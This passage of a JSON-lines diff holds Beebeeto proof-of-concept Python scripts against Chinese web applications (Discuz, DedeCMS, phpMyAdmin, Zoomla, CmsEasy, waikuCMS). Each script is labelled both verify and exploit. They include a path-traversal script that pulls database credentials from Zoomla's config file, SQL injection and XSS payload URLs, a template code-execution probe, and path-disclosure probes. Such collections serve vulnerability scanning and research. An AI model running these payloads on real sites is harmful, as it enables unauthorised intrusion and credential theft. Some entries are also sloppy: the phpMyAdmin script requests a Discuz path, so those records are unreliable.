verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "DedeCms", "id": "poc-2014-0084", "layer4_protocol": null}
+{"create_date": "2014-10-19 16:12:46", "name": "phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "phpmyadmin\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/layout.inc.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0083',\r\n            'name': 'phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2014-10-19',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'phpmyadmin',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['phpmyadmin\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/layout.inc.php'],\r\n            'desc': 'phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php',\r\n            'references': ['http://huaidan.org/archives/1642.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        paths = ['/', '/phpmyadmin/']\r\n        payload = '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n        for path in paths:\r\n            verify_url = args['options']['target'] + path + payload\r\n            if args['options']['verbose']:\r\n                print '[*] Request URL: ' + verify_url\r\n            try:\r\n                req = urllib2.Request(verify_url)\r\n                content = urllib2.urlopen(req).read()\r\n            except:\r\n                continue\r\n            if 'getImgPath()' in content and 'Fatal error:' and 'on line' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                return args\r\n            else:\r\n                args['success'] = False\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php", "app_name": "PHPMyAdmin", "id": "poc-2014-0083", "layer4_protocol": null}
+{"create_date": "2014-10-18 22:15:15", "name": "Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/table_myrepeats.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0082',\r\n            'name': 'Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n            'author': '1024',\r\n            'create_date': '2014-10-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['x2.5'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/table_myrepeats.php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://www.2cto.com/Article/201211/171301.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<b>Fatal error</b>:' in content and '/table_myrepeats.php</b>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0082", "layer4_protocol": null}
+{"create_date": "2014-10-17 22:50:56", "name": "Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/function_connect.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0076',\r\n            'name': 'Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n            'author': '1024',\r\n            'create_date': '2014-10-17',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['x2.0'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/function_connect.php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://sebug.net/vuldb/ssvid-24254',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/source/function/function_connect.php'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<b>Fatal error</b>:' in content and '/function_connect.php</b>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0076", "layer4_protocol": null}
+{"create_date": "2014-10-17 17:00:37", "name": "Discuz X2.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u9732,Discuz\u7206\u8def\u5f84,X2.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0075',\r\n            'name': 'Discuz X2.5 full Path Disclosure Vulnerability POC',\r\n            'author': '1024',\r\n            'create_date': '2014-10-17',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['2.5'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Discuz\u4fe1\u606f\u6cc4\u9732', 'Discuz\u7206\u8def\u5f84', 'X2.5\u8def\u5f84\u6cc4\u9732'],\r\n            'desc': '''\r\n                    Discuz! X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\r\n                    \u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002\r\n                    ''',\r\n            'references': ['http://www.cnseay.com/archives/2353',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_list =  ['/api.php','/uc_server/control/admin/db.php','/install/include/install_lang.php']\r\n        args['poc_ret']['file_path'] = []\r\n        for filename in file_list:\r\n            verify_url = args['options']['target'] + filename + '?mod[]=beebeeto'\r\n            try:\r\n                if args['options']['verbose']:\r\n                    print '[*] Requst URL: ' + verify_url\r\n                req = urllib2.urlopen(verify_url)\r\n                content = req.read()\r\n            except:\r\n                continue\r\n            if 'Warning:' in content and 'array_key_exists():' in content:\r\n                if '.php on line'  in content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['file_path'].append(verify_url)\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n            args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Discuz! X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002", "app_name": "Discuz", "id": "poc-2014-0075", "layer4_protocol": null}
+{"create_date": "2014-10-17 14:20:44", "name": "Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Zoomla\u6f0f\u6d1e,Arbitary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0073',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',  # \u540d\u79f0\r\n            'author': 'root',  # \u4f5c\u8005\r\n            'create_date': '2014-10-17',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Zoomla',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['2.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Arbitary File Download ',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['Zoomla\u6f0f\u6d1e', 'Arbitary File Download', ],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['N/A',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        username = \"\"\r\n        passwor = \"\"\r\n        payload = \"/User/UserZone/School/Download.aspx?f=..\\..\\..\\Config\\ConnectionStrings.config\" \r\n        verify_url = args['options']['target'] + payload\r\n        response = urllib2.urlopen(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] GET DATA from: ' + verify_url\r\n        html = response.read().decode('utf-8')\r\n        data = re.compile('User ID=(.*?);Password=(.*?)\"').findall(html)\r\n        username = data[0][0]\r\n        password = data[0][1]\r\n        if username and password :\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['username'] = username\r\n            args['poc_ret']['password'] = password\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.", "app_name": "Zoomla", "id": "poc-2014-0073", "layer4_protocol": null}
+{"create_date": "2014-10-16 17:24:01", "name": "DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "DedeCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/wap.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0071',\r\n            'name': 'DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'tmp',\r\n            'create_date': '2014-10-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'DedeCMS',\r\n            'vul_version': ['5.7'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['DedeCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/wap.php'],\r\n            'desc': 'DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n            'references': ['http://sebug.net/vuldb/ssvid-62607',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/wap.php?action=list&id=392%20test\"\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"Error page: <font color='red'>/wap.php?action=list&id=392%20test</font>\" in content:\r\n            if \"Error infos: You have an error in your SQL syntax;\" in content:\r\n                if \"typeid in(392 test)\" in content:\r\n                    args['success'] = True\r\n                    args['poc_ret']['vul_url'] = verify_url\r\n                    return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0071", "layer4_protocol": null}
+{"create_date": "2014-10-16 14:37:00", "name": "DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "DedeCMS\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0070',\r\n            'name': 'DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2014-10-16',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'DedeCMS',\r\n            'vul_version': ['5.7'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['DedeCMS\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'swfupload.swf'],\r\n            'desc': 'DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2010-038593',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n        file_path = \"/images/swfupload/swfupload.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url + r'?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%221%22%29}}//'\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0070", "layer4_protocol": null}
+{"create_date": "2014-10-11 16:44:25", "name": "CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "cmseasy,xss,\u53cd\u5c04\u578bXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0063',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',  # \u4f5c\u8005\r\n            'create_date': '2014-10-10',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'cmseasy',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['<=5.5'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Cross Site Scripting',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['cmseasy', 'xss', '\u53cd\u5c04\u578bXSS'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-069363',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/demo.php?time=alert('f4aa169c58007f317b2de0b73cecbd92')\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        if \"time:alert('f4aa169c58007f317b2de0b73cecbd92'),\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002", "app_name": "CmsEasy", "id": "poc-2014-0063", "layer4_protocol": null}
+{"create_date": "2014-10-11 11:01:09", "name": "waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foxhack", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "waikucms,\u4ee3\u7801\u6267\u884c,search.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0062',\r\n            'name': 'waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n            'author': 'foxhack',\r\n            'create_date': '2014-10-11',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'waikucms',\r\n            'vul_version': ['*'],\r\n            'type': 'Code Execution',\r\n            'tag': ['waikucms', '\u4ee3\u7801\u6267\u884c', 'search.html'],\r\n            'desc': 'Search.html \u53c2\u6570 keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-048523',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        vul_url = args['options']['target']+'/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D'\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + vul_url\r\n        response = urllib2.urlopen(urllib2.Request(vul_url)).read()\r\n        if '<title>phpinfo()</title>' in response:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = vul_url\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Search.html \u53c2\u6570 keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c", "app_name": "Other", "id": "poc-2014-0062", "layer4_protocol": null}
